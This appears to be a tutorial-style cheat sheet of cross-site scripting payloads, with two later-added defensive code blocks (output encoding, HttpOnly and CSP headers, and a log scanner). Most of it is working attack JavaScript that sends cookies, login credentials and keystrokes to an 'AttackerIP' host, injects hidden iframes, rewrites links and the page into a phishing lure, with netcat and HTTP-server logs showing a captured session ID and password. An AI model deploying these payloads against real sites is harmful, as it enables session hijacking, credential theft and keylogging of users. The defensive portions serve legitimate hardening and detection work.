
Some basic XSS attacks.

Stealing Cookies

<script> new Image().src="http://AttackerIP/bogus.php?output="+document.cookie; </script>

<script> document.location='http://AttackerIP/bogus.php?output='+document.cookie</script>

Start a netcat listener before injecting and you’ll receive the victim’s cookie:

# nc -nlvp 80
listening on [any] 80 ...
connect to [] from (UNKNOWN) [] 55540
GET /bogus.php?output=PHPSESSID=tvd2ljlt16328t3ej2pqliv5e2;%20LANG=EN_US;%20SINCE=1542307743;%20LIMIT=10;%20DOMAIN=admin HTTP/1.1
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1
Accept: */*
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept-Language: en-US,*

Once we have an authorised user’s cookie, we can use a Firefox extension such as Cookie Quick Manager or Cookie Editor to load the stolen session ID into our browser and access the web app as that user.

Browser Redirection & IFRAME Injection

<iframe SRC="http://AttackerIP/report" height="0" width="0"></iframe>

Once the victim visits the affected output page, we’ll receive a connection on our attacking machine:

# nc -nlvp 80 
listening on [any] 80 ... 
connect to [AttackerIP] from (UNKNOWN) [Victim] 49275 
GET /report HTTP/1.1 
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */* 
Accept-Language: en-US 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729) 
Accept-Encoding: gzip, deflate 
Host: AttackerIP
Connection: Keep-Alive

Browser redirection may be used to send the victim’s browser to a client-side attack or to an information-gathering script.
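The following is an added defensive example, not code from the original post: it shows the reflected-output bug that lets the cookie-theft and iframe payloads above run, next to the output encoding, HttpOnly cookie flag and Content-Security-Policy that neutralise them. It is Node.js with no dependencies; the page markup, cookie name and session id are constructed.

```javascript
// Added example (not from the original post). Node.js, no dependencies.
// Page markup, cookie name and session id below are constructed.
// Vulnerable: the query parameter is reflected into the page untouched, so
// the <script> and <iframe> payloads from the post execute in the victim's browser.
function renderSearchUnsafe(query) {
  return "<h1>Results for " + query + "</h1>";
}

// Hardened: encode the HTML metacharacters before reflecting attacker-controlled input.
function escapeHtml(s) {
  var map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, function (c) { return map[c]; });
}

function renderSearchSafe(query) {
  return "<h1>Results for " + escapeHtml(query) + "</h1>";
}

// HttpOnly keeps the session id out of document.cookie: even if injection
// succeeds, the "output=PHPSESSID=..." request above carries nothing useful.
function sessionCookieHeader(sessionId) {
  return "PHPSESSID=" + sessionId + "; Path=/; Secure; HttpOnly; SameSite=Lax";
}

// A Content-Security-Policy header that refuses inline scripts, hidden
// iframes to foreign hosts and the new Image().src beacon to AttackerIP.
// (CSP does not stop a document.location redirect; that needs the encoding above.)
function cspHeader() {
  return [
    "default-src 'self'",
    "script-src 'self'",   // inline <script> blocks are not executed
    "img-src 'self'",      // image beacons may only go to our own origin
    "frame-src 'none'",    // no <iframe> at all on these pages
  ].join("; ");
}

// True when a rendered page still contains an executable script or iframe tag.
function containsActiveTag(html) {
  return /<script\b|<iframe\b/i.test(html);
}

// The headers and body a server would send together for one search request.
function buildResponse(query, sessionId) {
  return {
    headers: { "Set-Cookie": sessionCookieHeader(sessionId), "Content-Security-Policy": cspHeader() },
    body: renderSearchSafe(query),
  };
}
```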

Modifying HTML

  • Changing the title (first h1 heading) of the target page to New Title:
document.getElementsByTagName("h1")[0].innerHTML = "New Title";

  • Adding a new form field:
var chalForm = document.getElementsByClassName("form-signin")[0];
var input = document.createElement("input");
input.type = "text";
input.name = "PIN";
input.placeholder = "PIN";
chalForm.insertBefore(input, chalForm.childNodes[6]);

  • Changing all links on the target page to point to our attacking host, serving up the malicious file evil.txt:
var links = document.getElementsByTagName("a");
for (var i = 0; i < links.length; i++)
    links[i].href = "http://AttackerIP/evil.txt";

Form Submission Hijacking

  • For the username and password variables we select the first form, indicated by forms[0].

  • We then select the first and second elements of said form, where elements[0] represents the username input field and elements[1] the password input field.

  • Data entered into these fields is then assigned to the respective variables.

  • Once the form is submitted by the victim our function InterceptForm is called: document.forms[0].onsubmit = InterceptForm;.

  • We then simply send ourselves the captured credentials by leveraging Image().src and setting the value to our own HTTP server.

function InterceptForm() {
    var username = document.forms[0].elements[0].value;
    var password = document.forms[0].elements[1].value;
    new Image().src = "http://AttackerIP/?username=" + username + "&password=" + password;
}
document.forms[0].onsubmit = InterceptForm;

Receive the credentials from our JavaScript payload:

# python -m SimpleHTTPServer 80  

... "GET /?username=victim&password=Sup3rSecP@ssw0rd HTTP/1.1" 200 -

Social Engineering

  • First we create the h2 element and input our new heading text, stating Website Under Construction.

  • Secondly, we then create the h3 element and input our malicious redirect text Please visit SuperSecureCompany.com.

  • Upon clicking, the link will send the victim to a domain/malicious file under our control.

  • We want to keep our malicious domain as close to the target domain as possible, tricking the victim into believing the site is legitimately down and following our link.

  • Lastly, we append our h2 and h3 header elements to the page and remove the login form that was there originally.

var input = document.createElement("h2");
input.innerHTML = "Website Under Construction";

var link = document.createElement("h3");
link.innerHTML = "Please visit" + " SuperSecureCompany.com".link('http://SuperSecComp.com/evil.txt');


Before injection:

After injection:

Capturing Clicks

  • We declare a function CaughtClick, with a link to our malicious URL.

  • We then add an EventListener to the document body.

  • If the victim clicks anywhere on the page whilst browsing our target site, the event listener will ‘catch’ the click and run our CaughtClick function, sending the victim to a malicious site under our control.


function CaughtClick() {
    location.href = "http://AttackerIP/evil.txt";
}
document.body.addEventListener('click', CaughtClick, true);


  • We assign the onkeypress event to our function KeyLog.

  • We then assign the victim’s key event to the variable input, which is passed as the argument to the KeyLog function.

  • The key_pressed variable receives the character for the Unicode value of the specific key pressed by the victim (input.which), converted with String.fromCharCode.

  • Finally, we send each value of key_pressed to our Python SimpleHTTPServer using Image().src.

document.onkeypress = function KeyLog(input) {
    var key_pressed = String.fromCharCode(input.which);
    new Image().src = "http://AttackerIP/?" + key_pressed;
};

# python -m SimpleHTTPServer 80

... "GET /?v HTTP/1.1" 200 -
... "GET /?i HTTP/1.1" 200 -
... "GET /?c HTTP/1.1" 200 -
... "GET /?t HTTP/1.1" 200 -
... "GET /?i HTTP/1.1" 200 -
... "GET /?m HTTP/1.1" 200 -
... "GET /?  HTTP/1.1" 200 -
... "GET /?P HTTP/1.1" 200 -
... "GET /?a HTTP/1.1" 200 -
... "GET /?s HTTP/1.1" 200 -
... "GET /?s HTTP/1.1" 200 -
... "GET /?w HTTP/1.1" 200 -
... "GET /?o HTTP/1.1" 200 -
... "GET /?r HTTP/1.1" 200 -
... "GET /?d HTTP/1.1" 200 -
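As an added detection example (not part of the original post), the following scans the vulnerable application’s own access log, where a reflected payload from any of the sections above (script or iframe injection, document.cookie theft, the Image().src beacon, the onsubmit/onkeypress/click hooks) appears in the request line, rather than the attacker’s listener shown in this post. Node.js with no dependencies; the log lines and the 203.0.113.7 address are constructed.

```javascript
// Added example (not from the original post): scan an application's access log
// for the reflected payloads shown in the post. Log lines and the 203.0.113.7
// "attacker" address are constructed samples.
const SAMPLE_LOG = [
  '10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /search?q=shoes HTTP/1.1" 200 512',
  '10.0.0.9 - - [12/Mar/2024:10:01:07 +0000] "GET /search?q=%3Cscript%3Enew%20Image().src%3D%22http%3A%2F%2F203.0.113.7%2F%3F%22%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 640',
  '10.0.0.9 - - [12/Mar/2024:10:02:15 +0000] "GET /search?q=%253Cscript%253Edocument.onkeypress%253Dfunction(e)%257B%257D%253C%252Fscript%253E HTTP/1.1" 200 640',
  '10.0.0.9 - - [12/Mar/2024:10:03:01 +0000] "GET /profile?name=%3Ciframe%20src%3D%22http%3A%2F%2F203.0.113.7%2Freport%22%20height%3D%220%22%3E HTTP/1.1" 200 700',
];

// Each indicator maps to one technique from the post.
const INDICATORS = [
  { name: "script-tag",    re: /<script\b/i },
  { name: "iframe",        re: /<iframe\b/i },
  { name: "cookie-access", re: /document\.cookie/i },
  { name: "image-beacon",  re: /new\s+Image\(\)\s*\.src/i },
  { name: "event-hook",    re: /\.onsubmit\s*=|\.onkeypress\s*=|addEventListener\s*\(/i },
];

// Decode repeatedly (bounded) so a double-URL-encoded payload is inspected
// in the same form the application eventually sees.
function fullyDecode(s) {
  let prev = null, cur = s;
  for (let i = 0; i < 3 && cur !== prev; i++) {
    prev = cur;
    try { cur = decodeURIComponent(cur); } catch (e) { break; }
  }
  return cur;
}

// Returns null for a clean line, otherwise the client IP, the decoded
// request target and the list of matched indicators.
function scanLine(line) {
  const m = line.match(/"(?:GET|POST|HEAD|PUT) (\S+) HTTP\/[\d.]+"/);
  if (!m) return null;
  const decoded = fullyDecode(m[1]);
  const hits = INDICATORS.filter((ind) => ind.re.test(decoded)).map((ind) => ind.name);
  if (hits.length === 0) return null;
  return { ip: line.split(" ")[0], target: decoded, indicators: hits };
}

function scanAccessLog(lines) {
  return lines.map(scanLine).filter((hit) => hit !== null);
}

// Run over the constructed log: three of the four lines are flagged.
scanAccessLog(SAMPLE_LOG).forEach((hit) => console.log(hit.ip, hit.indicators.join(","), hit.target));
```

Stored payloads arrive in POST bodies, which a standard access log does not record, so the same indicators belong at the input-validation layer as well.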